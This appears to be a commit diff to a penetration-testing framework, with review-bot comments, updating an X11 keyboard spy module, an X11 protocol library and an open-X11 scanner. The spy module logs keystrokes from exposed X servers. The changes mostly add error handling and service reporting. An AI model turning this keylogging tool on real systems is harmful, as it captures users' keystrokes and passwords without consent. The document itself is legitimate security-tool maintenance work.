xspy updates
h00die committed Nov 21, 2024
1 parent 07cc3bb commit 4ff3897
Showing 4 changed files with 434 additions and 49 deletions.
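--- a/lib/rex/proto/x11/window.rb
+++ b/lib/rex/proto/x11/window.rb
@@ -191,23 +191,24 @@ class X11GetWindowResponse < BinData::Record
 end
 end
 
-def create_overlay_map(screen_width, screen_height, windows)
-# Initialize a 2D array to represent the screen
-screen = Array.new(screen_height) { Array.new(screen_width, nil) }
-windows.each_with_index do |window, i|
-puts window.inspect
-x, y, width, height = window
-# Mark the visible region occupied by the window
-(y...y + height).each do |row|
-(x...x + width).each do |col|
-screen[row][col] = i
-end
-end
-end
-screen.each do |row|
-puts row.join('')
-end
-end
+# for future use
+# def create_overlay_map(screen_width, screen_height, windows)
+# # Initialize a 2D array to represent the screen
+# screen = Array.new(screen_height) { Array.new(screen_width, nil) }
+# windows.each_with_index do |window, i|
+# puts window.inspect
+# x, y, width, height = window
+# # Mark the visible region occupied by the window
+# (y...y + height).each do |row|
+# (x...x + width).each do |col|
+# screen[row][col] = i
+# end
+# end
+# end
+# screen.each do |row|
+# puts row.join('')
+# end
+# end
 
 class X11Image
 def initialize(width, height, image_data, color_data)
@@ -221,31 +222,32 @@ def self.from_replies(width, height, image_reply, color_reply)
 new(width, height, image_reply.image_data, color_reply.colors)
 end
 
-def create_image
-# Extract relevant data from @image_data and @color_data
-width = @width
-height = @height
-pixel_data = @image_data
-colors = @color_data
-
-# Create an image object
-image = ChunkyPNG::Image.new(width, height, ChunkyPNG::Color::TRANSPARENT)
-
-# Populate image with pixel data and colors
-pixel_data.each_with_index do |pixel, i|
-color = colors[pixel]
-# Set pixel color in the image
-image[i % width, i / width] = ChunkyPNG::Color.rgb(color.red, color.green, color.blue)
-end
-# (0...height).each do |y|
-# (0...width).each do |x|
-# # Extract color information from the pixel data and set the corresponding pixel in the PNG image
-# color = colors[y+x]
-# # pixel_color = extract_color_from_z_data(z_data)
-# image[x, y] = ChunkyPNG::Color.rgb(color.red, color.green, color.blue)
-# end
-# end
-
-image
-end
+# for future use
+# def create_image
+# # Extract relevant data from @image_data and @color_data
+# width = @width
+# height = @height
+# pixel_data = @image_data
+# colors = @color_data
+
+# # Create an image object
+# image = ChunkyPNG::Image.new(width, height, ChunkyPNG::Color::TRANSPARENT)
+
+# # Populate image with pixel data and colors
+# pixel_data.each_with_index do |pixel, i|
+# color = colors[pixel]
+# # Set pixel color in the image
+# image[i % width, i / width] = ChunkyPNG::Color.rgb(color.red, color.green, color.blue)
+# end
+# # (0...height).each do |y|
+# # (0...width).each do |x|
+# # # Extract color information from the pixel data and set the corresponding pixel in the PNG image
+# # color = colors[y+x]
+# # # pixel_color = extract_color_from_z_data(z_data)
+# # image[x, y] = ChunkyPNG::Color.rgb(color.red, color.green, color.blue)
+# # end
+# # end
+
+# image
+# end
 end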
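Review bot: `create_overlay_map` and `X11Image#create_image` are kept as commented-out blocks under `# for future use` instead of being deleted, so the file now carries 46 lines of dead text, including a `puts window.inspect` debug line and an inner loop that was already commented out before this change. Commented code is neither parsed nor linted nor tested, so it tends to drift away from the classes around it; removing both methods and recovering them from history when they are needed would be cleaner. If they have to stay, the marker should say what is blocking their use rather than only `# for future use`, for example `# TODO: unused; restore once a caller exists (needs ChunkyPNG)`. The `X11Image` class body starts outside the second hunk.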
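--- a/modules/auxiliary/gather/x11_keyboard_spy.rb
+++ b/modules/auxiliary/gather/x11_keyboard_spy.rb
@@ -134,7 +134,11 @@ def run
 @keylogger_print_buffer = ''
 
 vprint_status('Establishing TCP Connection')
-connect # tcp connection establish
+begin
+connect # tcp connection establish
+rescue Rex::ConnectionError
+fail_with(Msf::Module::Failure::Unreachable, 'Connection failed')
+end
 vprint_status('[1/9] Establishing X11 connection')
 connection = x11_connect
 
@@ -208,7 +212,12 @@ def run
 map_raw_data = sock.get_once(-1, 1)
 # for debugging packet output, uncomment following line
 # puts data.bytes.map { |b| "\\x" + b.to_s(16).rjust(2, '0') }.join
-map_data = X11GetMapReply.read(map_raw_data)
+begin
+map_data = X11GetMapReply.read(map_raw_data)
+rescue EOFError
+debug_data = map_raw_data.bytes.map { |b| '\\x' + b.to_s(16).rjust(2, '0') }.join
+fail_with(Msf::Module::Failure::UnexpectedReply, "Unable to process X11GetMapReply response (EOFError): #{debug_data}")
+end
 
 vprint_status('[8/9] Enabling notification on keyboard and map')
 sock.put(X11SelectEvents.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
@@ -232,13 +241,13 @@ def run
 
 print_good('All setup, watching for keystrokes')
 # loop mechanics stolen from exploit/multi/handler
-stime = Time.now.to_f
-print_timer = Time.now.to_f
+stime = Process.clock_gettime(Process::CLOCK_MONOTONIC)
+print_timer = Process.clock_gettime(Process::CLOCK_MONOTONIC)
 timeout = datastore['LISTENER_TIMEOUT'].to_i
 printerval = datastore['PRINTERVAL'].to_i
 begin
 loop do
-break if timeout > 0 && (stime + timeout < Time.now.to_f)
+break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC))
 
 sock.put(X11QueryKeyMapRequest.new.to_binary_s)
 bit_array_of_keystrokes = X11QueryKeyMapReply.read(sock.get_once(-1, 1)).data
@@ -258,6 +267,8 @@ def run
 print_good("X11 Key presses observed: #{@keylogger_print_buffer}")
 @keylogger_print_buffer = ''
 end
+rescue EOFError
+print_error('Connection closed by remote host')
 ensure
 vprint_status('Closing X11 connection')
 sock.put(Rex::Proto::X11::X11RequestHeader.new(opcode: 60).to_binary_s +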
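Review bot: The new `rescue EOFError` after the polling loop prints 'Connection closed by remote host', but the `ensure` that follows still calls `sock.put(...)` on that same socket. If the `EOFError` really means the peer has gone, that write can raise from inside `ensure` and replace the clean message with a backtrace; setting a flag in the rescue (`remote_closed = true`) and guarding the teardown write with `unless remote_closed` would avoid this. Separately, `sock.get_once(-1, 1)` may return nil on a read timeout, which presumably would not surface as `EOFError` in `X11GetMapReply.read` or `X11QueryKeyMapReply.read`, so a nil check before parsing is worth adding in both places. `run` starts and ends outside these hunks, and the `sock.put` statement in `ensure` continues past the last visible line.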
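--- a/modules/auxiliary/scanner/x11/open_x11.rb
+++ b/modules/auxiliary/scanner/x11/open_x11.rb
@@ -51,6 +51,13 @@ def run_host(ip)
 
 if connection.header.success == 1
 print_connection_info(connection, ip, rport)
+report_service(
+host: rhost,
+proto: 'tcp',
+port: rport,
+info: "Open X Server (#{connection.body.vendor}) #{connection.body.screen_width_in_pixels}x#{connection.body.screen_height_in_pixels}",
+name: 'X11'
+)
 else
 vprint_error("#{ip} Access not successful: #{connection.body.reason}")
 end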
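Review bot: `connection.body.vendor` is taken from the remote server's reply and interpolated unfiltered into the `info:` string given to `report_service`, so whatever bytes the scanned host sends end up in the workspace database and in any console or report view that prints service info. Treat it as untrusted by stripping non-printable characters and capping the length before interpolating, e.g. `vendor = connection.body.vendor.to_s.gsub(/[^[:print:]]/, '.')[0, 64]`. The call also passes `host: rhost` while the surrounding lines use the `ip` argument of `run_host(ip)`; `host: ip` would keep the method consistent. `run_host` starts and ends outside the hunk.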